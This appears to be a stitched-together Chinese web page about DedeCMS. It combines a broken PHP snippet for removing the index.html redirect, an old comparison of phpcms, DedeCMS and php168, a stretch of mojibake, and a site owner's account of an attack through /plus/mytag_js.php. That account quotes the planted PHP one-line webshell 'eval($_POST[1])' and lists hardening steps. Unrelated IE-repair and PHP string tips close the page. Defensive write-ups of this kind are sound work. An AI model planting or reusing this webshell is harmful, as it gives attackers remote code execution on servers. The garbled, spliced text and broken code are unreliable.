网站模板库
  • 首页
  • web前端工具
    • HTML/JS转换工具
    • JS/HTML格式化工具
    • 字母/英文大小写转换工具
    • robots.txt文件生成工具
    • Js压缩/格式化工具
    • Css在线压缩工具_代码格式化
  • 关于我们
    • 免责声明
    • 联系我们
    • 广告服务
    • 服务项目
    • 关于我们
    • 网站轮播
    • 公告
    • 成都优优科技专用
    • 按行业分类
  • web学院
    • 服务器教程
    • 学习资料
      • 基础书籍
      • 交互书籍
      • 入门教程
      • 特效分类
    • 案例分享
    • web资讯
  • 网页特效
    • 图片特效
    • 导航特效
    • 滑动按钮
    • 表单特效
    • 文字特效
    • 弹窗特效
    • 其他特效
  • 织梦模板
    • 科技/电子/数码/通信
    • 文化/艺术/广告/传媒
    • 装修/设计/家居/家具
    • 基建/施工/地产/物业
    • 餐饮/酒店/旅游/票务
    • 食品/果蔬/饮料/日用
    • 服饰/珠宝/礼品/玩具
    • 摄影/婚庆/家政/生活
    • 运动/健身/体育/器材
    • 学校/教育/培训/科研
    • 美容/保健/医院/医疗
    • 金融/财税/咨询/法律
    • 政府/组织/集团/协会
    • 汽车/物流/交通/搬运
    • 机械/设备/制造/仪器
    • 化工/环保/能源/材料
    • 农业/畜牧/养殖/宠物
    • 其他模版
    • IT/软件/信息/互联网
  • 手机模板
    • 手机APP模板
    • 微信小程序模板
    • wap
  • 网站模板
    • joomla模板
    • Drupal模板
    • z-blog模板
    • EyouCms模板
    • Bootstrap模板
    • 帝国cms模板
    • CmsEasy模板
    • MetInfo模板
    • 购物商城模板
      • Shopify主题
      • PrestaShop主题
    • 后台模板
    • 纯HTML模板
    • ecshop模板
    • phpwind模板
    • pbootcms模板
    • phpcms模板
    • wordpress模板
    • discuz模板
  • 教程
    • 织梦教程
    • Discuz教程
    • WordPress教程
    • Phpcms教程
    • Phpwind教程
    • ECShop教程
    • Joomla教程
    • Drupal教程
    • zblog教程
    • EyouCMS教程
    • 帝国cms教程
    • MetInfo教程
    • CmsEasy教程
登录
当前位置:网站模板库 > 教程 > 织梦教程 > dedecms的漏洞:Dedecms的隐患如何预防风险
商业源码 织梦教程 2023-09-14 2:12:02

dedecms的漏洞:Dedecms的隐患如何预防风险

dedecms的漏洞:Dedecms的隐患如何预防风险,第1张

  关于dedecms织梦程序首页如何去除indexhtml有以下三种解决方法

  一、静态访问也分3种解决方法

  1、IIS

  打开IIS点击文档,里面将indexhtml置于indexphp上面,这有什么作用呢其实这样设置就是在网站同时有indexphp和indexhtml的情况下,先访问index,html这样就不会出现跳转的情况

          

  2、Apache

  apache里面DirectoryIndex来控制文件检索优先级的

  DirectoryIndex indexhtml indexphp indexhtm

  和iis一样,将indexhtml往前放

  3、虚拟主机

  把网站默认首页indexhtml放到indexphp前面,这样它自动读到indexhtml就不会跳转了

          

  二、直接动态浏览

  网站动态访问的情况下,程序会删除根目录下面的Indexhtml

,那么会执行include(dirname(__FILE__)。‘/indexhtml’);这段代码,把首页引用而非跳转。

          

  三、把dedecms的indexphp更为以下内容

  GetOne("Select From `#@__homepageset`"); $row['templet'] =

MfTemplet($row['templet']); $pv = new PartView();

$pv->SetTemplet($cfg_basedir $cfg_templets_dir "/" $row['templet']);

$pv->SaveToHtml(dirname(__FILE__)'/indexhtml');

include(dirname(__FILE__)'/indexhtml'); exit(); >

  //自动生成HTML版

  require_once (dirname(__FILE__) "/include/commonincphp");

  require_once DEDEINC"/arcpartviewclassphp";

  $GLOBALS['_arclistEnv'] = 'index';

  $row = $dsql->GetOne("Select From `#@__homepageset`");

  $row['templet'] = MfTemplet($row['templet']);

  $pv = new PartView();

  $pv->SetTemplet($cfg_basedir $cfg_templets_dir "/"

$row['templet']);

  $pv->SaveToHtml(dirname(__FILE__)'/indexhtml');

  include(dirname(__FILE__)'/indexhtml');

  exit();

  >

  其实主要就是把那段301定向代码删除

  header(‘HTTP/11 301 Moved Permanently’);

  header(‘Location:indexhtml’);

大体试用了一下三个系统,得出了一个比较粗浅的结论:

1、phpcms:

phpcms自2007版本开源以后才开始引起广泛关注,但这次也是头一次研究。用了几天,有了一点初步的印象。(以下以2007版为例,2008版尚未正式推出)

粗看起来,phpcms 2007是三者中最为完善的,各项功能考虑的很细致,导致进了新手进了后台先要晕半天才行。各项功能,比如UNIX系统的权限、模版修改、广告、商城、信息、单网页。。。。都做的相当的完备了。

发表文章的关键字、作者、来源、自动远程保存等等,都做的不错。但是,phpcms发表文章的摘要,似乎是只能自动截取,不能手工设置,灵活性欠佳。

发表的文章可以通过关键字来索引相关贴,做的不错。

支持通行证方式进行论坛和其它系统的整合,可以进行正向和反向两种方式的整合。但是文档说的不太清楚,研究了半天才成功。但是反向整合pw501登录后自动跳转不回来。

phpcms 2007的后台安排的太琐碎,看的头晕。发一篇文章也要晕半个钟头,而且首页的更新莫不清规律,幻灯片老半天不更新。

phcms尽管功能很强大,但是却缺少一样重要的东西:可视化的模版工具,这也是php168和dedecms共同的缺点。在这方面,他们甚至不如刚刚起步的DiyPage好,DiyPage只是一个刚刚具备了雏形的CMS系统,却拥有一个很方便的后台可视化界面设计工具,即使是菜鸟也可以轻松设计界面(虽然灵活性没那么强大,但是足够你用了)。

phpcms 2007整体以频道为依据进行组织,即使你不想用频道,哪也得用,这个已经由不了你了 。所以如果仅仅是一个比较简单的网站,也用上一个频道,看起来够别扭的,这是phpcms 2007最大的缺点,不过看了phpcms 2008beta2发现,phpcms终于解除了这个垃圾限制。

发现phpcms的广告功能似乎不完善,一个广告位定义了两个广告,不能自动轮换,总是显示第一个。

phpcms虽然实现了模块化,但是不管你用不用,一大堆模块稀里呼噜就装上了,看起来很不爽,也不直观。

phpcms虽然是很早就是商业化运作的软件,然后开发效率却是不高,新版本屡屡跳票,影响了它的产品形象,让开源以来积累的人气和一些拥趸大失所望。然而最近贴上了六间房以后,资金应该是没有压力了,新版本也开始浮出水面,2008beta1已经发布了,可惜问题多多。

phpcms 2008 beta2 在 MySQL4 上还是有使用问题,不过比beta1强一些,beta1直接就安装不了,不知道正式版是否会正式放弃MySQL4。

phpcms 2008beta2看上去不错,新功能令人振奋的,界面清爽。以前一团乱麻的后台界面已经打扫干净了。phpcms 2008的标签采用了中英文混合的方式,对菜鸟来说更加容易上手,比较新颖。另外,beta2好像是实现了类似php168的可视化模版中的标签设置方式,虽然不是可视化的设计模版,总归可以自定义一些元素样式了。不过这个beta2版也还是顶多算是个预览版,BUG极多,功能不全。如果准备用phpcms的话,怕是还要大大的等几天才行。

另外,phpcms官方论坛对免费版的支持很不到位,伤了很多粉丝的心。

2、dedecms

51应该是dedecms正式商业化运作以后推出的第一个版本吧?以前的dedecms个体作坊式的发展,由于作者兼职时间和精力不足,导致发展缓慢,新版本频频跳票,引起广大粉丝的强烈不满,甚至导致柏拉图和dedecms用家之间的语言冲突。然而dedecms在商业化运作以后,新版本的发布周期大大缩短,产品功能不断改进,界面美化了很多,人气和用户数量大大增长了,现在看发展势头不错。

dedecms的根目录是最简单的,只有几个文件,比以上两个都强多了,其实这样不仅看起来清爽,维护起来也方便,值得表扬

dedecms的频道非常费解,看起来只有频道模型,要增加频道就要添加模版文件有点费解,仔细研究发现,这个dedecms其实和php168的方式差不多,任何栏目都可以添加子目录,绑定域名,其实就和频道是一个意思,栏目和频道可以互相转换。

dedecms的通行证只支持反向整合,就是dedecms可以用服务端的用户数据登录。其实所谓整合,一般也就是这样的。论坛用整站用户数据的情况恐怕极为少见,对论坛管理也不利。

但是dedecms的通行证整合,需要修改论坛文件,不明白为啥要这样,是因为论坛的通行证功能还不完善吗?

dedecms的广告管理用起来比较麻烦,要先定义标签,然后手工在模板中插入。好像模版上没预定义好广告位置,实在是太不应该了。。。。相当于手动操作,不符合当今历史潮流啊。而且大家常用的广告自动轮换功能,也没有实现。

试用发现,dedecms有时还有一些小毛病,比如远程附件功能,有时发现无法自动转存到本地。另外,在模块数量上,dedecms也无法和php168和phpcms相比,只有文章、下载、、Flash等基本的功能,不知道dedecms 2007发布以后能否有所改观

dedecms的相关文章、热点文章等功能,用了静态生成的方式直接写入到了HTML文件中,这样在生成HTML后,无法自动更新,需要经常手工重新生成全部HTML才能更新相关文档和热点文档。但是大量的重复生成所有HTML文件效率太低下了,这方面dedecms不如php168最新添加的相关文章功能,是用JS方式实现的,不需要更新HTML就能自动索取最新的相关文章。但是使用JS方式也存在服务器效率的问题。

dedecms的首页、列表页、还有文章页都使用了单独的模板,没有使用header和footer模板,这样的好处是可以产生各种风格的页面(允许首页、列表页、内容页使用不同的风格),但是缺点是修改添加头部和底部广告、导航条的时候,相当费劲,要一个一个模板的修改。而且dedecms的版权声明字段设置太小,只有250字节,写不进去多少内容,顶多能添加个计数器就不错了。

dedecms起步就用了类似XML标签方式,而且官方还提供了Dreamweaver的插件来识别标签,应该说在国内是比较独到的。但是这种方式也需要新手一定的时间才能适应。同时,dedecms一直缺乏比较完善的文档,也进一步加大了菜鸟上手的难度。

dedecms最大的问题就是没有提供类似Diypage的可视化设计方式,因为标签比较难于上手,对新手来说做模板是很头疼的问题。

dedecms 51比40功能有了很多进步,增加DIGG功能,还有类似分类信息之类的功能都实现了。不过也有退步,比如关键词、相关帖功能都严重退步了,发帖也很不方便,而且dedecms在商业版本和免费版本之间做功能和代码区分,也自然会在免费版本上有所缩水。

dedecms商业化发展以后,目前出现的问题是免费版的技术支持做的不太到位,比phpcms强不了多少。

3、php168

php168关注很久了,却一直没怎么用过。当年整合论坛的30版给俺很深的印象,可惜论坛没有坚持下去。最近php168的开发工作很强劲,推出了N多模块,让人看的眼晕。

看过了phpcms的后台,再进php168的后台,感觉舒服多了,简洁多了,但是功能还可以。

php168的频道不是强制的,好像是栏目和频道可以转换,灵活性比phpcms强多了

关键字功能没有实现相关贴功能,不爽(新版本已经增加了,用JS方式实现的动态调用)。

php168一直不是用通行证实现整合论坛,这方面做的不好,灵活性欠佳。需要CMS和论坛安装在同一个数据库才行。

首页的标签设置,php168提供了一个可视化的工具,可以直接在上面设置标签,修改标签属性,这方面做的比phpcms强多了。虽然不能设计主页模板,但是可以方便的修改首页模板中元素的内容和显示方式,对菜鸟来说比较不错。dedecms的标签提供(或者公布)的属性比较少,想定制样式是比较麻烦的,目前可能是需要直接用PHP语句来修改。

但是要实现广告功能,还是要像dedecms一样,先定义标签,然后手工修改模版,有点太麻烦了,汗。另外,好像也没实现广告自动轮换功能()。

php168实现了模块化,可以一个一个的装,看起来比phpcms清爽多了

php168页面模板也是使用了标签方式,但是模板代码好像是类似phpwind的方式(这不奇怪,php168的作者本来就是从phpwind插件开发开始的),代码和模板的分离程度比较差,这个东西其实是个双刃剑,因为用php代码方式,灵活度是最大的,也不用像dedecms一样,标签难以上手,扩展困难;但是缺点也很大,就是不懂编程的人士难以上手,特别是美工和程序的分离不彻底(php168的官方模版就不如dedecms漂亮,不知道是不是这个原因)。

php168比dedecms多了一个可视化的首页标签定制功能,能设置首页元素的显示内容,显示方式,这是比dedecms略强了一些,有总比没有强啊。

因为php168研究的比较少,其它功能没仔细测试过,就不多讲了。总体来说,如果php168能稍加完善,其实是一个相当不错的整站程序。

�谌莺苌伲�赡苄慈氲氖焙虿皇呛芊奖悖�还�庑┐�氲淖饔萌肥挡恍〉摹�edecms一直是很火的建站cms,主要得益于两大站长网的鼎力支持;不过,人火是非多,cms太火了同样会被别有用心的人盯上。我的网站一直在使用dedecms,前段时间又一次受到攻击,攻击的目的很简单,那么便是黑链,知道后稍微修改下代码就恢复了,不是很严重;这段时间网站又被莫名上传文件,类似前一次,虽然对方还没来得及修改网站模板,不过这说明网站安全防患还未到位,对方任何时候都可能再次取得管理员权限,所以要特别注意网站的安全防患措施。因为我比较喜欢寻根究底,所以就去网上找了一下相关的资料,发现这确实是dedecms的漏洞,黑客可以利用多维的变量绕过正则检测,漏洞主要发生在/plus/mytag_jsphp中,原理便是准备一个MySQL数据库来攻击已知网站的数据库,通过向数据库中写入一句话的代码,只要成功写入,那么以后便可以利用这些代码来获得后台管理员权限。结合我的网站被攻击已经别人类似的经历来看,黑客写入的文件主要存在于/plus/文件夹下,目前已知的几个文件包括gaphp、logphp、bphp、b1php等,文件的特征便是短小,内容很少,可能写入的时候不是很方便,不过这些代码的作用确实不小的。下面这是gaphp文件中的部分代码:<title>login</title>no<phpeval($_POST[1])><title>login</title>no<phpeval($_POST[1])><title>login</title>no<phpeval($_POST[1])>实际的代码比上面截取的要长,不过都是这段代码的重复,至于logphp的代码,同这个类似,只有一句话,简单明了,如果你对网络安全稍有了解,那么会知道<php eval($_POST[1]);>是php一句话木马,使用部分指定的工具可以执行这段代码,预计是破解密码的功能。既然已经知道对方是利用什么样的漏洞,同时知道对方利用什么样的原理来利用漏洞,那么要怎么预防这些危险的事发生呢?经过查询大量的资料,我初步整理出下面这些预防漏洞被利用的步骤,希望对同样适用dedecms的站长朋友们有所帮助。一、升级版本打好补丁设置目录权限这是官方对此的解决办法,不管你使用的是什么版本的dedecms,都要及时在后台升级版本自动更新补丁,这是避免漏洞被利用的最重要的一步;同时官方还提供设置目录的方法,主要是设置data、templets、uploads、a为可读写不可执行权限;include、member、plus、后台管理目录等设置为可执行可读不可写入权限;删除install及special目录,具体如何设置见官方说明。二、修改admin账号及密码黑客可能是利用默认admin账号,随后推测密码来破解的,所以修改默认的admin账号非常重要,至于如何修改,方法很多,比较有效的是用phpadmin登陆网站数据库,找到dede_admin数据库表(dede是数据库表前缀),修改其中userid及pwd两项,其中密码一定要修改成f297a57a5a743894a0e4,这是默认的密码admin;修改后去后台登陆,登陆dede后台后修改密码。三、别的值得注意的地方至于更多的细节,同样要注意,尽量别选择太廉价的空间,太廉价的空间很容易出现服务器本身的安全问题,只要服务器出现问题,整个服务器下面的网站都没救了。还有便是,如果没必要,尽量别开通会员注册什么的,使用起来很麻烦;至于网站后台目录,不要写到robotstxt里面,同时每个月至少换一次,管理员密码什么的同样要更换,避免和别的账号密码相同被推测出来。

网页上有错误解决办法

手动修复办法:

1、点击“开始”菜单,打开“运行”。

2、输入regsvr32 jscriptdll后选择“确定”。 出现提示(jscriptdll中的DIIRegisterServer成功)后,点击“确定”。

3、再次输入regsvr32 vbscriptdll选择“确定”。 再一次出现提示(vbscriptdll中的DIIRegisterServer成功)后,点“确定”。 经过以上两次成功提示,说明已成功修复IE组件。

4、将浏览器的过滤等功能关闭后,清除一下浏览器的缓存(工具->Internet选项->(在Internet 临时文件框中-删除Cookies),再点Internet 临时文件框中删除文件(记得勾上删除所有脱机内容),确定后,然后再重新打开浏览器尝试!

软件修复办法:

1下载免费杀毒软件 金山毒霸2011

2选择系统清理选项,点击立即清理

3选择安全百宝箱中系统修复,即可解决网页上有错误解问题

用strrchr这个PHP自带的函数,就是从后面取字符串。然后用substr把逗号去掉,就可以了。

$str=substr(strrchr($string,','),1);

功能 方式 但是 代码 标签
DABAN RP主题是一个优秀的主题,极致后台体验,无插件,集成会员系统
网站模板库 » dedecms的漏洞:Dedecms的隐患如何预防风险

商业源码 钻石

分享到:
上一篇
织梦dedecms参数不正确,该会员模型不存在
下一篇
如何解决网站分页导致的SEO问题?

相关推荐

如何获取 Windows Server 2003 的最新 Service Pack

如何获取 Windows Server 2003 的最新 Service Pack

请问服务器都有几种类型

请问服务器都有几种类型

流媒体的硬件产品包括哪些?

流媒体的硬件产品包括哪些?

discuz x系列与Discuz!有何区别

discuz x系列与Discuz!有何区别

0条评论

发表评论 取消回复

要发表评论,您必须先登录。

提供最优质的资源集合

立即查看 了解详情
网站模板库

主题/付费下载/查看/余额管理/自定义积分,集成支付,卡密,推广奖励等。

本站导航
  • 链接标题
友情链接
  • 链接标题
快速搜索
本站由钛宇宙强力驱动
友情链接:
    商业源码网蜀ICP备2023005044号
    网站模板库
    • 登录
    • 注册
    网站模板库
    • 首页
    • web前端工具►
      • HTML/JS转换工具
      • JS/HTML格式化工具
      • 字母/英文大小写转换工具
      • robots.txt文件生成工具
      • Js压缩/格式化工具
      • Css在线压缩工具_代码格式化
    • 关于我们►
      • 免责声明
      • 联系我们
      • 广告服务
      • 服务项目
      • 关于我们
      • 网站轮播
      • 公告
      • 成都优优科技专用
      • 按行业分类
    • web学院►
      • 服务器教程
      • 学习资料►
        • 基础书籍
        • 交互书籍
        • 入门教程
        • 特效分类
      • 案例分享
      • web资讯
    • 网页特效►
      • 图片特效
      • 导航特效
      • 滑动按钮
      • 表单特效
      • 文字特效
      • 弹窗特效
      • 其他特效
    • 织梦模板►
      • 科技/电子/数码/通信
      • 文化/艺术/广告/传媒
      • 装修/设计/家居/家具
      • 基建/施工/地产/物业
      • 餐饮/酒店/旅游/票务
      • 食品/果蔬/饮料/日用
      • 服饰/珠宝/礼品/玩具
      • 摄影/婚庆/家政/生活
      • 运动/健身/体育/器材
      • 学校/教育/培训/科研
      • 美容/保健/医院/医疗
      • 金融/财税/咨询/法律
      • 政府/组织/集团/协会
      • 汽车/物流/交通/搬运
      • 机械/设备/制造/仪器
      • 化工/环保/能源/材料
      • 农业/畜牧/养殖/宠物
      • 其他模版
      • IT/软件/信息/互联网
    • 手机模板►
      • 手机APP模板
      • 微信小程序模板
      • wap
    • 网站模板►
      • joomla模板
      • Drupal模板
      • z-blog模板
      • EyouCms模板
      • Bootstrap模板
      • 帝国cms模板
      • CmsEasy模板
      • MetInfo模板
      • 购物商城模板►
        • Shopify主题
        • PrestaShop主题
      • 后台模板
      • 纯HTML模板
      • ecshop模板
      • phpwind模板
      • pbootcms模板
      • phpcms模板
      • wordpress模板
      • discuz模板
    • 教程►
      • 织梦教程
      • Discuz教程
      • WordPress教程
      • Phpcms教程
      • Phpwind教程
      • ECShop教程
      • Joomla教程
      • Drupal教程
      • zblog教程
      • EyouCMS教程
      • 帝国cms教程
      • MetInfo教程
      • CmsEasy教程

      弹窗标题

      这是一条网站公告,可在后台开启或关闭,可自定义背景颜色,标题,内容,用户首次打开关闭后不再重复弹出,此处可使用html标签...